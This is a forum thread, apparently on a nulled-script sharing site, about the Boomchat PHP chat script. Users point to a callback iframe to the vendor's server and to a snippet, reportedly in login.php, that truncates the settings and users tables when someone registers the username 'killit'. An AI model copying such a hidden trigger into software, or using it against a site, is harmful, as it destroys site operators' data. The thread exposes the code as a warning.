09-25-2015, 04:37 AM
10-09-2015, 09:21 PM
thanks for sharing dude :)
11-06-2015, 01:14 AM
nice share,
thank you
rep given
thank you
rep given
11-21-2015, 09:28 AM
Anyone have addons Boom stream for Boomchat PHP/AJAX chat or Boom Quiz.
Please share, this awesome addon
Thanks all my friends... Great thread ++Reps
Please share, this awesome addon
Thanks all my friends... Great thread ++Reps
11-21-2015, 11:42 AM
Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Sorry please help me, this script callback and can't be use in my server.
11-21-2015, 12:06 PM
(11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
11-21-2015, 01:05 PM
(11-21-2015 12:06 PM)sup3rman Wrote: [ -> ]yes i install boom_embed, thanks for the advice(11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
11-21-2015, 01:09 PM
(11-21-2015 12:06 PM)sup3rman Wrote: [ -> ](11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
not sure, maybe removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
11-21-2015, 01:46 PM
(11-21-2015 01:05 PM)ozghelp Wrote: [ -> ](11-21-2015 12:06 PM)sup3rman Wrote: [ -> ]yes i install boom_embed, thanks for the advice(11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
Addons are clean too. I suggest removing the line i tell after, as I can see they get you installation and backdoor into the script or something like that.
(11-21-2015 01:09 PM)mdarparvez Wrote: [ -> ](11-21-2015 12:06 PM)sup3rman Wrote: [ -> ](11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
not sure, maybe removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
yes or just changing the domain for somehitng else.
11-21-2015, 02:25 PM
(11-21-2015 12:06 PM)sup3rman Wrote: [ -> ](11-21-2015 11:42 AM)ozghelp Wrote: [ -> ]Its not clean, please fix this
Sorry please help me, this script callback and can't be use in my server.
Did you install any of the addons? As main script seems clean expect to an iframe in admin_settings.php to the dev server.
just try register new user with this
username: killit
then login as killit
!! the site will destroy
i think the author added bad codes in (login.php)
Code:
if($username == 'killit'){
$mysqli->query("TRUNCATE TABLE setting");
$mysqli->query("TRUNCATE TABLE users");
}
and you must remove this folder (rescue)